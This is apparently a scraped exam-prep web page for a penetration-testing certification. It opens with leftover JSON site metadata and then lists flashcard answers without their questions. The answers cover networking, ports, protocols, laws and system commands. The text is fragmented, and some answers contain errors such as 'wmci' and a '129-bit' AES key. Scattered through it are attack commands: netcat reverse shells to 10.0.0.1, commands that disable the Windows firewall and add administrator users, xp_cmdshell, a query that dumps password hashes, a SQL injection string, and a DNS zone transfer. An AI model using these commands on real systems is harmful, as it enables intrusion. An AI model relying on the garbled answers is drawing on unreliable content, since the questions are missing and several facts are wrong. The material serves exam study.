center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[],"tags":[],"class_list":["post-110842","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts\/110842","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/comments?post=110842"}],"version-history":[{"count":0,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts\/110842\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/media?parent=110842"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/categories?post=110842"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/tags?post=110842"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
find . -type f -iname ‘.pdf’ locate ‘<\/em>.pdf’<\/p>\n\n\n\n
\/bin – User Binaries
\/boot – Bootup related files
\/dev – Interface for system devices
\/etc – System Config Files
\/home – Base directory for user files
\/lib – Critical software libraries
\/opt – Third party software
\/proc – System and running processes
\/root – Home for root
\/sbin – Sys Admin binaries
\/tmp – Temporary Files
\/usr – Less critical files
\/var – Variable system files<\/p>\n\n\n\n
A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores<\/p>\n\n\n\n
Common packet analyzers. Allows the user to display TCP\/IP and other packets being transmitted or received over a network to which the computer is attached<\/p>\n\n\n\n
Open source firewall\/router computer software distribution based on FreeBSD<\/p>\n\n\n\n
prstat -a<\/p>\n\n\n\n
svcs -a<\/p>\n\n\n\n
svcadm start<\/p>\n\n\n\n
Windows NT 3.1 (All)<\/p>\n\n\n\n
Windows NT 3.5 (All)<\/p>\n\n\n\n
Windows NT 3.51 (All)<\/p>\n\n\n\n
Windows NT 4.0 (All)<\/p>\n\n\n\n
Windows 2000 (All)<\/p>\n\n\n\n
Windows XP (Home, pro, MC, Tablet, PC, Starter, Embedded)<\/p>\n\n\n\n
Windows XP (64 bit, Pro 64 bit)
Windows Server 2003 and R2
Windows Home Server<\/p>\n\n\n\n
Windows Vista (All)
Windows Server 2008 (Foundation, Standard, Enterprise)<\/p>\n\n\n\n
Windows 7 (All)
Windows Server 2008 R2 (All)<\/p>\n\n\n\n
Windows 8
Windows Phone 8
Windows Server 2012<\/p>\n\n\n\n
Contains the boot options for computers with BIOS firmware running NT-based operating system prior to Windows Vista<\/p>\n\n\n\n
Stores Windows users’ passwords in a hashed format (in LM hash and NTLM hash). These are backups of C:\\windows\\system32\\config\\SAM<\/p>\n\n\n\n
ver : OS Version
sc query state=all : Services
tasklist \/svc : Processes and Services
echo %USERNAME% : Current user<\/p>\n\n\n\n
dir \/a \/s \/n c:.pdf<\/p>\n\n\n\n
net user \/add
net localgroup “Administrators” \/add<\/p>\n\n\n\n
useradd (adduser )
passwd
sudo useradd sudo (sudo adduser sudo)<\/p>\n\n\n\n
Linux: ifconfig
Windows: ipconfig \/all<\/p>\n\n\n\n
Linux: cat
Windows: cat<\/p>\n\n\n\n
A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.<\/p>\n\n\n\n
Windows NT Addon<\/p>\n\n\n\n
NT 4.0<\/p>\n\n\n\n
NT 4 Service Pack<\/p>\n\n\n\n
NT4 Option Pack<\/p>\n\n\n\n
Windows 2000<\/p>\n\n\n\n
Windows XP<\/p>\n\n\n\n
Windows Server 2003, Windows XP Pro<\/p>\n\n\n\n
Windows Vista, Server 2008<\/p>\n\n\n\n
Windows 7, 2008 R2<\/p>\n\n\n\n
Windows Server 2012, Windows 8<\/p>\n\n\n\n
Windows Server 2012 R2, Windows 8.1<\/p>\n\n\n\n
Windows Server 2016, Windows 10 Anniversary Update<\/p>\n\n\n\n
Windows 10 Fall Creators, v1709<\/p>\n\n\n\n
Windows Server 2019, Windows 10 October Update<\/p>\n\n\n\n
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off<\/p>\n\n\n\n
A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions<\/p>\n\n\n\n
Windows Management Instrumentation Command-Line<\/p>\n\n\n\n
wmci process call create “process_name”<\/p>\n\n\n\n
wmci product get name \/value
wmci product where name=”XX” call uninstall \/nointeractive<\/p>\n\n\n\n\n
-DO NOT STORE sensitive data (ie CVV2, CVV or CID values)<\/li>\n<\/ul>\n\n\n\n
C:\\Windows\\NTDS<\/p>\n\n\n\n
C:\\Windows\\SYSVOL<\/p>\n\n\n\n
Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain<\/p>\n\n\n\n
128 Networks (2^7), 16,777,216 Addresses per network (2^24)<\/p>\n\n\n\n
Default Subnet Mask : 255.0.0.0
CIDR Notation : \/8<\/p>\n\n\n\n
16,384 Networks (2^14), 65,536 Addresses per network (2^16)<\/p>\n\n\n\n
Default Subnet Mask : 255.255.0.0
CIDR Notation : \/16<\/p>\n\n\n\n
2,097,152 Networks (2^21), 256 Addresses per network (2^8)<\/p>\n\n\n\n
Default Subnet Mask : 255.255.255.0
CIDR Notation : \/24<\/p>\n\n\n\n
If the first bit is a “0”, it’s a class A address (Half the address space has a “0” for the first bit, so this is why class A takes up half the address space.)<\/p>\n\n\n\n
Class C – 255.255.255.0 , \/24 (254 Hosts)
Class B – 255.255.0.0 , \/16 (65,534 Hosts)
Class A – 255.0.0.0 , \/8 (16,777,214 Hosts)<\/p>\n\n\n\n
RTFM page 36<\/p>\n\n\n\n
0
1
2
3
4
5
6
7
8
9
10 – A
11 – B
12 – C
13 – D
14 – E
15 – F<\/p>\n\n\n\n
A switched network that is logically segmented by function, project team, or application, without regard to the physical locations of the users.<\/p>\n\n\n\n
Token Ring and FDDI VLANs<\/p>\n\n\n\n
Extended-range VLANs (not stored in the VLAN database)<\/p>\n\n\n\n
Normal-range VLANs<\/p>\n\n\n\n
Configurations for VLAN IDs 1-1005<\/p>\n\n\n\n
Linux:
nc 10.0.0.1 1234 -e \/bin\/sh
Windows:
nc 10.0.0.1 1234 -e cmd.exe<\/p>\n\n\n\n
nc -nlvp<\/p>\n\n\n\n
Listener : nc -nlvp 4444 > incoming.exe<\/p>\n\n\n\n
Listener:
nc -nlvp 4444 -e cmd.exe (to set up cmd to run)<\/p>\n\n\n\n
nc -nv IP to connect to 4444<\/p>\n\n\n\n
Attacking Listener<\/p>\n\n\n\n
Listener:
nc -nlvp 4444<\/p>\n\n\n\n
nc -nv IP to send to 4444 \/bin\/bash<\/p>\n\n\n\n
Attacking Sender<\/p>\n\n\n\n
-sP : ping scan
-sS : syn scan (“half open” scan)
-sT : connect scan (full TCP)
-sU : UDP scan
-sO : protocol scan<\/p>\n\n\n\n
65,536 (2^16) Ports<\/p>\n\n\n\n
TCP: nmap -p-
UDP: nmap -sU -p-<\/p>\n\n\n\n
-p1-65535 : Ports
-T[0-5] : “Scan Speed”, can help hide you
-n : No DNS Resolution
-O : OS Detection
-A : AGGRESSIVE
-sV : Version Detection
-PN : No Ping
-6 : IPv6 Scan
-oA : Output ALL types<\/p>\n\n\n\n
nmap -R -sL -dns-server<\/p>\n\n\n\n
MD5 : 16 Bytes
SHA-1 : 20 bytes
SHA-256 : 32 Bytes
SHA-512 : 64 Bytes<\/p>\n\n\n\n
Microsoft Web Server<\/p>\n\n\n\n
Apache Web Servers<\/p>\n\n\n\n
Google Web Server<\/p>\n\n\n\n
IBM Web Server<\/p>\n\n\n\n
LiteSpeed Tech Web Server<\/p>\n\n\n\n
SELECT @@version<\/p>\n\n\n\n
(detailed version info)<\/p>\n\n\n\n
EXEC master..xp_cmdshell ‘net user’<\/p>\n\n\n\n
SELECT HOST_NAME( ) : Hostname and IP<\/p>\n\n\n\n
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’)<\/p>\n\n\n\n
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES<\/p>\n\n\n\n
SELECT name, password_hash FROM master.sys.sql_logins<\/p>\n\n\n\n
SELECT version(); : DB Version<\/p>\n\n\n\n
root | MYSQL<\/p>\n\n\n\n
SELECT @@version; : DB Version<\/p>\n\n\n\n
SHOW TABLES (only works for current database)<\/p>\n\n\n\n
SELECT * FROM v$version; : DB Version
(SELECT version FROM v$instance;)<\/p>\n\n\n\n
(SELECT name FROM v$database;)<\/p>\n\n\n\n
Allow any user to log in from any host:<\/p>\n\n\n\n
host<\/p>\n\n\n\n
+@netgroup<\/p>\n\n\n\n
python -c ‘import pty;pty.spawn(“\/bin\/bash”)’<\/p>\n\n\n\n
Log Injection
Deadlock
Language-based Attacks<\/p>\n\n\n\n
Code Injection
Buffer Overflow<\/p>\n\n\n\n
Code Insertion
Malformation
Race Conditions<\/p>\n\n\n\n
Race Conditions<\/p>\n\n\n\n
Incorrect Element Removal<\/p>\n\n\n\n
Network Interface Card<\/p>\n\n\n\n
An expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection.<\/p>\n\n\n\n
Media Access Control<\/p>\n\n\n\n
Network Address Translation<\/p>\n\n\n\n
An address for communications on the physical network segment.<\/p>\n\n\n\n
A technique that allows private IP addresses to be used on the public Internet.<\/p>\n\n\n\n
“Please Dont Nag Tyrannosaurus, She’ll Probably Attack”<\/p>\n\n\n\n
2 : Data Link (Frames)
3 : Network (Packets)
4 : Transport (Segments)
5 : Session (Data)
6 : Presentation (Data)
7 : Application (Data)<\/p>\n\n\n\n
“Never Ingest Turian Almonds”<\/p>\n\n\n\n
2 : Internet Layer
3 : Transport Layer
4 : Application Layer<\/p>\n\n\n\n
Internet Engineering Task Force<\/p>\n\n\n\n
Internet Assigned Numbers Authority<\/p>\n\n\n\n
802.11b – 2.4 GHz 11 Mbps
802.11a – 5 GHz, 54 Mbps
802.11g – 2.4 GHz, 54 Mbps
802.11n – 5 GHz, 108 Mpbs
802.15 – Bluetooth 2.4 GHz<\/p>\n\n\n\n
1) SLIP (serial line internet protocol)
2) PPP (point-to-point protocol)
3) ARP (address resolution protocol) (resolves IP’s into MAC’s)
4) RARP (reverse address resolution protocol) (MAC’s into IP’s)
5) L2F (layer 2 forwarding)
6) L2TP (layer 2 tunneling protocol)
7) PPTP (point-to-point tunneling protocol)
8) ISDN (integrated services digital network)<\/p>\n\n\n\n
Address Resolution Protocol<\/p>\n\n\n\n
Internet Group Management Protocol<\/p>\n\n\n\n
Fully Qualified Domain Name<\/p>\n\n\n\n
Indications of Compromise<\/p>\n\n\n\n
Point of Contact<\/p>\n\n\n\n
Security Information and Event Management<\/p>\n\n\n\n
Microsoft Baseline Security Analyzer<\/p>\n\n\n\n
type of cable that has the ability to transfer information from one computer to another<\/p>\n\n\n\n
a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems.<\/p>\n\n\n\n
A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data.<\/p>\n\n\n\n
Automatic Private Internet Protocol Addressing<\/p>\n\n\n\n
maximum transmission unit – The largest data unit a network (for example, Ethernet or token ring) will accept for transmission.<\/p>\n\n\n\n
a message that is sent from a single sender to a single recipient<\/p>\n\n\n\n
a form of transmission in which a message is delivered to a group of hosts<\/p>\n\n\n\n
a protocol used between routers so that they can learn routes to add to their routing tables.<\/p>\n\n\n\n
A routing method that floods routing
information to all routers within a network to build and maintain a more complex network route database.<\/p>\n\n\n\n
Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of
the next hop.<\/p>\n\n\n\n
Routing protocol that uses the attributes of both distance vector and link state<\/p>\n\n\n\n
Interior Gateway Protocol<\/p>\n\n\n\n
A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP<\/p>\n\n\n\n
Exterior Gateway Protocol<\/p>\n\n\n\n
A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today.<\/p>\n\n\n\n
A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion.<\/p>\n\n\n\n
128-bit in Hexidecimal<\/p>\n\n\n\n
A Media Access Control address is a hardware address that uniquely identifies each node on a network.<\/p>\n\n\n\n
The design of a computer network; includes both physical and logical design.<\/p>\n\n\n\n
LAN (Ethernet)
10 Mbps<\/p>\n\n\n\n
“Fast Ethernet”
100 Mbps<\/p>\n\n\n\n
Gigabit Ethernet
1 GB<\/p>\n\n\n\n
Any type of computer network that is not connected by cables of any kind.<\/p>\n\n\n\n
LAN that shares total bandwidth with all stations (ex. Token Ring)<\/p>\n\n\n\n
LAN with bandwidth shared between sender and receiver (Predicated Paths)<\/p>\n\n\n\n
Company that tracks web statistics, used to fingerprint web servers<\/p>\n\n\n\n
a public Internet database that contains information about Internet domain names and the people or organizations that registered the domains. It is a source of information that can be used to exploit system vulnerabilities.<\/p>\n\n\n\n
Filtering outbound traffic<\/p>\n\n\n\n
Filtering inbound traffic<\/p>\n\n\n\n
SOA- Start of Auth Record
MX- Mail Exchange
TXT- Text Record
A- Address (IPv4)
AAAA- Address (IPv6)
NS – Name Server
PTR – Pointer Record
HINFO – Description of computer \/ OS
CNAME – Canonical Name<\/p>\n\n\n\n
Every zone file must include a _<\/em> record to identify the name server that’s primarily responsible for the database segments it manages.<\/p>\n\n\n\n
A record used by e-mail servers for determining the host names of servers responsible for handling a domain’s incoming e-mail.<\/p>\n\n\n\n
IP Address<\/p>\n\n\n\n
announces the authoritative name servers for a particular zone who will answer queries for their supported zone<\/p>\n\n\n\n
A record that points IP addresses\/Canonical to host names. See also Reverse Lookup Zone.<\/p>\n\n\n\n
A type of DNS data record that holds alternative names for a host.<\/p>\n\n\n\n
ARP
DHCP
CDP
HSRP
VRRP
VTP
STP
TACACS<\/p>\n\n\n\n
a Cisco proprietary Layer 2 protocol to gather information about neighboring Cisco devices<\/p>\n\n\n\n
This is exclusive to Cisco and allows a default router address to be configured to be used in the event that the primary router fails.<\/p>\n\n\n\n
A standard that assigns a virtual IP address to a group of routers. At first, messages routed to the virtual IP address are handled by the master router. If the master router fails, backup routers stand in line to take over responsibility for the virtual IP address.<\/p>\n\n\n\n
Cisco’s protocol for exchanging VLAN information over trunks. Allows one switch on a network to centrally manage all VLANs.<\/p>\n\n\n\n
A Layer 2 protocol that is used for routing and prevents network loops by adopting a dynamic routing method.<\/p>\n\n\n\n
Wired Equivalent Privacy<\/p>\n\n\n\n
An IEEE 802.11 security protocol designed to ensure that only authorized parties can view transmitted wireless information. Has significant vulnerabilities and is not considered secure.<\/p>\n\n\n\n
Wireless Protected Access<\/p>\n\n\n\n
The 802.11 security method created as a stopgap between WEP and 802.11i.<\/p>\n\n\n\n
A protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.<\/p>\n\n\n\n
Extensible Authentication Protocol<\/p>\n\n\n\n
Lightweight Extensible Authentication Protocol<\/p>\n\n\n\n
Protected Extensible Authentication Protocol<\/p>\n\n\n\n
A Windows utility that is used to view and
manage NetBIOS name cache information.<\/p>\n\n\n\n
A domain controller that holds a subset of the information in all domain partitions for the entire Active Directory forest.<\/p>\n\n\n\n
Present on every subnet. Needed for a routed TCP\/IP network<\/p>\n\n\n\n
Flexible Single Master Operations<\/p>\n\n\n\n
Also known as operations master roles, these are servers that provide certain functions that can only be handled by one domain controller at a time.<\/p>\n\n\n\n
The original hash used to store Windows passwords, known as LM hash, based off the DES algorithm. (Legacy)<\/p>\n\n\n\n
New Technology LAN Manager<\/p>\n\n\n\n
Successor to the LM hash. A more advanced hash used to store Windows passwords, based off the RC4 algorithm.<\/p>\n\n\n\n
NTLMv2 was developed in response to attacks against the LM authentication protocol. The LM protocol, as the name implies, was originally used in the old LAN Manager Network operating system in the mid-1980s. It uses the MD5 password hash algorithm.<\/p>\n\n\n\n
A link-state routing protocol used on IP networks.<\/p>\n\n\n\n
An type of routing used by a network
administrator to manually specify the mappings in the routing table.<\/p>\n\n\n\n
Allows a router to determine the best route between two nodes automatically and then store this information in a routing table.<\/p>\n\n\n\n
TCP Port Service Multiplexer (TCPMUX)<\/p>\n\n\n\n
Remote Job Entry (RJE)<\/p>\n\n\n\n
ECHO or ICMP<\/p>\n\n\n\n
Message Send Protocol (MSP)<\/p>\n\n\n\n
MSG ICP<\/p>\n\n\n\n
time<\/p>\n\n\n\n
Host Name Server (Nameserv)<\/p>\n\n\n\n
WHOIS<\/p>\n\n\n\n
Gopher Services<\/p>\n\n\n\n
finger<\/p>\n\n\n\n
X.400 Standard<\/p>\n\n\n\n
SQL Services<\/p>\n\n\n\n
NNTP (Network News Transfer Protocol)<\/p>\n\n\n\n
SQL Server<\/p>\n\n\n\n
Gateway Access Control Protocol (GACP)<\/p>\n\n\n\n
Directory Location Service (DLS)<\/p>\n\n\n\n
Novell Netware over IP<\/p>\n\n\n\n
Simple Network Paging Protocol (SNPP)<\/p>\n\n\n\n
Apple QuickTime<\/p>\n\n\n\n
IKE Internet Key exchange (TCP\/UDP)<\/p>\n\n\n\n
An Act which makes illegal a number of activities such as deliberately planting viruses, hacking, using ICT equipment for fraud.<\/p>\n\n\n\n
Act of Parliament that incorporated the European Convention on Human Rights into UK law, making it enforceable in UK courts<\/p>\n\n\n\n
The UK law that tells organisations how they must protect the personal data of real people. (NOW GDPR)<\/p>\n\n\n\n
New European Union law on data protection and privacy for individuals.<\/p>\n\n\n\n
Denial of Service<\/p>\n\n\n\n
An attack on a computer or network device in which multiple computers send data and requests to the device in an attempt to overwhelm it so that it cannot perform normal operations.<\/p>\n\n\n\n
A type of application attack where the attacker takes advantage of scripting and input validation vulnerabilities in an interactive website to attack legitimate users.<\/p>\n\n\n\n
Bug that allows authentication even when password provided is incorrect.<\/p>\n\n\n\n
Observing host behavior and packets (DHCP, TCP, etc) to determine OS<\/p>\n\n\n\n
Sends specially crafted packets to the remote OS and analyzes the received response.<\/p>\n\n\n\n
A block cypher created in the late 1990s that uses a 128-bit block size and a 128-, 129-, or 256-bit key size.<\/p>\n\n\n\n
A security protocol created by the IEEE 802.11i task group to replace WEP.<\/p>\n\n\n\n
EXPN
VRFY<\/p>\n\n\n\n
The prescan function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code via buffer overflow attacks, as demonstrated using the parseaddr function in parseaddr.c.<\/p>\n\n\n\n
Runs on TCP Port 6000
(can range between 6000-6063)<\/p>\n\n\n\n
Can be assessed using portmapper requests<\/p>\n\n\n\n
XSS that occurs when the attacker’s script that is injected is not stored in the backend, and the Web-browser client simply echoes back the results of the script execution. It can be over GET (QueryString) or POST (Forms) methods.<\/p>\n\n\n\n
malicious code that remains on a website (for ex) until it is removed<\/p>\n\n\n\n
Simple Object Access Protocol<\/p>\n\n\n\n
An XML-based communication protocol used for sending messages between applications via the Internet.<\/p>\n\n\n\n
An attack that injects XML tags and data into a database. Can change data, effect how data is processed, etc.<\/p>\n\n\n\n
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts<\/p>\n\n\n\n
Denial of Service (DoS)
Buffer overflow attacks
Attacks on vulnerable scripts
URL manipulation<\/p>\n\n\n\n
*Risky Methods are marked with a star<\/p>\n\n\n\n
HEAD (similar to GET)
POST
PUT*
DELETE*
CONNECT*
OPTIONS
TRACE*
PATCH<\/p>\n\n\n\n
An attack that allows for the construction of LDAP statements based on user input statements, which can then be used to access the LDAP database or modify the database’s information<\/p>\n\n\n\n
An encoding scheme which represents any binary data using only printable ASCII characters. Usually used for encoding email attachments over SMTP<\/p>\n\n\n\n
Open Source Security Testing Methodology Manual<\/p>\n\n\n\n
Institute for Security and Open Methodologies<\/p>\n\n\n\n
Open Web Application Security Project<\/p>\n\n\n\n
Pen Testing Execution Standard<\/p>\n\n\n\n
Centre for the Protection of National Infrastructure (UK best practices)<\/p>\n\n\n\n
Defines police limitations of searching tech<\/p>\n\n\n\n
This act defines cybercrime as any illegal act for which knowledge of computer technology is essential for its perpetration, investigation, or prosecution; currently being evaluated for revision because much of its language was developed before the Internet boom<\/p>\n\n\n\n
Health Insurance Portability and Accountability Act<\/p>\n\n\n\n
Federal Information Security Management Act<\/p>\n\n\n\n
Gramm-Leach-Bliley Act<\/p>\n\n\n\n
requires financial institutions to ensure the security and confidentiality of customer data<\/p>\n\n\n\n
General Data Protection Regulation<\/p>\n\n\n\n
Family Educational Rights and Privacy Act<\/p>\n\n\n\n
Payment Card Industry Data Security Standard<\/p>\n\n\n\n
an agreement that required that banks hold as capital at least 8% of their risk-weighted assets<\/p>\n\n\n\n
this series contains a range of individual standards and documents specifically reserved by ISO for information security<\/p>\n\n\n\n
Control Objectives for Information and Related Technology<\/p>\n\n\n\n
The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying “to” and “from” addresses using a dotted decimal such as “122.45.255.0”.<\/p>\n\n\n\n
Category 5 wire, a TIA\/EIA standard for UTP wiring that can operate at up to 100 Mbps.<\/p>\n\n\n\n
Time to Live<\/p>\n\n\n\n
Carrier Sense Multiple Access with Collision Avoidance<\/p>\n\n\n\n
Code Division Multiple Access (GSM competitor)<\/p>\n\n\n\n
OSI physical layer PDU is the bit
OSI data link layer PDU is the frame
OSI network layer PDU is the packet
OSI transport layer PDU is the segment
PDUs between OSI session and application layers are referred to simply as the data
OSI Model PDU<\/p>\n\n\n\n
System Processes
1.3.6.1.2.1.25.4.2.1.2
Running Programs
1.3.6.1.2.1.25.4.2.1.4
Processes Path
1.3.6.1.2.1.25.2.3.1.4
Storage Units
1.3.6.1.2.1.25.6.3.1.2
Software Name
1.3.6.1.2.1.77.1.2.25
User Accounts
1.3.6.1.2.1.6.13.1.3
TCP Local Ports
Microsoft SNMP<\/p>\n\n\n\n
Multiplexer tcpmux<\/p>\n\n\n\n
Echo<\/p>\n\n\n\n
System status. syst at<\/p>\n\n\n\n
Date and time.<\/p>\n\n\n\n
netstat<\/p>\n\n\n\n
chargen<\/p>\n\n\n\n
ftp<\/p>\n\n\n\n
ssh<\/p>\n\n\n\n
Telnet<\/p>\n\n\n\n
smtp<\/p>\n\n\n\n
Time<\/p>\n\n\n\n
wins<\/p>\n\n\n\n
whois<\/p>\n\n\n\n
tacacs<\/p>\n\n\n\n
DNS<\/p>\n\n\n\n
gopher<\/p>\n\n\n\n
finger<\/p>\n\n\n\n
http<\/p>\n\n\n\n
Kerberos<\/p>\n\n\n\n
pop3<\/p>\n\n\n\n
auth<\/p>\n\n\n\n
nntp<\/p>\n\n\n\n
Netbios<\/p>\n\n\n\n
imap<\/p>\n\n\n\n
bgp<\/p>\n\n\n\n
LDAP<\/p>\n\n\n\n
https<\/p>\n\n\n\n
SMB (cifs)<\/p>\n\n\n\n
exec (remote)<\/p>\n\n\n\n
login (remote )<\/p>\n\n\n\n
shell (remote)<\/p>\n\n\n\n
socks proxy<\/p>\n\n\n\n
ms-sql<\/p>\n\n\n\n
TNS Oracle<\/p>\n\n\n\n
pptp<\/p>\n\n\n\n
ms-sql (hidden)<\/p>\n\n\n\n
squid proxy<\/p>\n\n\n\n
Globalcat<\/p>\n\n\n\n
mysql<\/p>\n\n\n\n
RDP<\/p>\n\n\n\n
postgres<\/p>\n\n\n\n
vnc<\/p>\n\n\n\n
X11<\/p>\n\n\n\n
Jetdirect<\/p>\n\n\n\n
DNS<\/p>\n\n\n\n
DHCP<\/p>\n\n\n\n
ttfp<\/p>\n\n\n\n
ntp<\/p>\n\n\n\n
RPC<\/p>\n\n\n\n
Netbios<\/p>\n\n\n\n
snmp<\/p>\n\n\n\n
SMB<\/p>\n\n\n\n
IKE<\/p>\n\n\n\n
rwho<\/p>\n\n\n\n
RIP<\/p>\n\n\n\n
ms-sql \/ ssrs<\/p>\n\n\n\n
nfs<\/p>\n\n\n\n
Temporal Key Integrity Protocol<\/p>\n\n\n\n
Extensible Markup Language<\/p>\n\n\n\n
Local Security Authority Subsystem Service<\/p>\n\n\n\n
Local Security Authority<\/p>\n\n\n\n
Rivest, Shamir, & Adleman<\/p>\n\n\n\n
carriage-return\/line-feed<\/p>\n\n\n\n
Open Shortest Path First<\/p>\n\n\n\n
Network File System<\/p>\n\n\n\n
Routing Information Protocol<\/p>\n\n\n\n
Internet Key Exchange<\/p>\n\n\n\n
Advanced Encryption Standard<\/p>\n\n\n\n
Structured Query Language<\/p>\n\n\n\n
Internet Server Application Programming Interface<\/p>\n\n\n\n
Active Server Pages<\/p>\n\n\n\n
Network Time Protocol<\/p>\n\n\n\n
Windows Server Update Services<\/p>\n\n\n\n
Secure Shell<\/p>\n\n\n\n
Web Services Description Language<\/p>\n\n\n\n
Canonical Name<\/p>\n\n\n\n
Time to Live<\/p>\n\n\n\n
Common Gateway Interface<\/p>\n\n\n\n
Spanning Tree Protocol<\/p>\n\n\n\n
Requests all data on a domain.<\/p>\n\n\n\n
Password.<\/p>\n\n\n\n
Cisco ios<\/p>\n\n\n\n
Data Encryption Standard<\/p>\n\n\n\n
56 bits<\/p>\n\n\n\n
Layer 7: Application<\/p>\n\n\n\n
302<\/p>\n\n\n\n
SQL server 2000<\/p>\n\n\n\n
xp_cmdshell<\/p>\n\n\n\n
Echo<\/p>\n\n\n\n
CHANGE_ON_INSTALL<\/p>\n\n\n\n
user cookie and session information compromised<\/p>\n\n\n\n
Sandbox<\/p>\n\n\n\n
finger 0@<\/p>\n\n\n\n
Don’t use a salt.<\/p>\n\n\n\n
Execute any DOS commands.<\/p>\n\n\n\n
\u2026..reduce attack surface against IIS<\/p>\n\n\n\n
‘ or 1=1 – –<\/p>\n\n\n\n
Inspecting host field in client request.<\/p>\n\n\n\n
OPTIONS<\/p>\n\n\n\n
SMTP<\/p>\n\n\n\n
dig @relay.example.org example.org axfr<\/p>\n\n\n\n
VRFY EXPN RCPT TO<\/p>\n\n\n\n
MySQL 4.0.15<\/p>\n\n\n\n
64 bits<\/p>\n\n\n\n
128<\/p>\n\n\n\n
AES<\/p>\n\n\n\n
Salted md5?<\/p>\n\n\n\n
\/etc\/hosts.equiv<\/p>\n\n\n\n
Expires<\/p>\n\n\n\n
net use \\host\\ipc$”” \/u:””<\/p>\n\n\n\n
Misuse of computer act.<\/p>\n\n\n\n
8.12.4<\/p>\n\n\n\n
rusers -l<\/p>\n\n\n\n
\/etc\/shadow<\/p>\n\n\n\n
Options, delete,put,trace,<\/p>\n\n\n\n
%systemroot%\\system32\\config\\SAM<\/p>\n\n\n\n
Windows 2000<\/p>\n\n\n\n
128<\/p>\n\n\n\n
Cookie HTTP header.<\/p>\n\n\n\n
Simple Object Access Protocol<\/p>\n\n\n\n
POST<\/p>\n\n\n\n
ICMP<\/p>\n\n\n\n
EHLO<\/p>\n\n\n\n
Version 1<\/p>\n\n\n\n
Windows<\/p>\n\n\n\n
RSA<\/p>\n\n\n\n
3<\/p>\n\n\n\n
wmic qfe<\/p>\n\n\n\n
Before Oracle 10g it could be remotely managed.<\/p>\n\n\n\n
()&*|<\/p>\n\n\n\n
Rivest, Shamir, & Adleman<\/p>\n\n\n\n
Spoof certificate and execute man in the middle attack<\/p>\n\n\n\n
httponly<\/p>\n\n\n\n
4.0.99k<\/p>\n\n\n\n
NTDS.DIT<\/p>\n\n\n\n
32 bits<\/p>\n\n\n\n
Restrict Anonymous.<\/p>\n\n\n\n
identity protection.<\/p>\n\n\n\n
10.1.168.192. In-addr.arpa. IN PTR alpha.example.com<\/p>\n\n\n\n
dig @beta.example.com version.bind chaos txt<\/p>\n\n\n\n
Host based authentication disabled.<\/p>\n\n\n\n
Quit.<\/p>\n\n\n\n
PORT<\/p>\n\n\n\n
48 Bits<\/p>\n\n\n\n
Ethernet<\/p>\n\n\n\n
DBSNMP<\/p>\n\n\n\n
Username enumeration.<\/p>\n\n\n\n
Bad Length<\/p>\n\n\n\n
400<\/p>\n\n\n\n
You cannot list directory.<\/p>\n\n\n\n
Address Resolution Protocol<\/p>\n\n\n\n
VLAN Trunking Protocol<\/p>\n\n\n\n
Cisco Discovery Protocol<\/p>\n\n\n\n
Terminal Access Controller Access Control System<\/p>\n\n\n\n
Continue<\/p>\n\n\n\n
Switching Protocols<\/p>\n\n\n\n
Processing<\/p>\n\n\n\n
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network<\/p>\n\n\n\n
used in virtual private networks (VPNs)<\/p>\n\n\n\n
65535<\/p>\n\n\n\n
65535<\/p>\n\n\n\n
10.0.0.0\/8<\/p>\n\n\n\n
172.16.0.0\/12<\/p>\n\n\n\n
192.168.0.0\/16<\/p>\n\n\n\n
provides a reference-method for publicly known information-security vulnerabilities and exposures<\/p>\n\n\n\n
an open industry standard for assessing the severity of computer system security vulnerabilities<\/p>\n\n\n\n
part of a system for risk-assessing computer security threats<\/p>\n\n\n\n
a category system for software weaknesses and vulnerabilities<\/p>\n\n\n\n
the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)<\/p>\n\n\n\n
Internal Server Error<\/p>\n\n\n\n
Not Implemented<\/p>\n\n\n\n
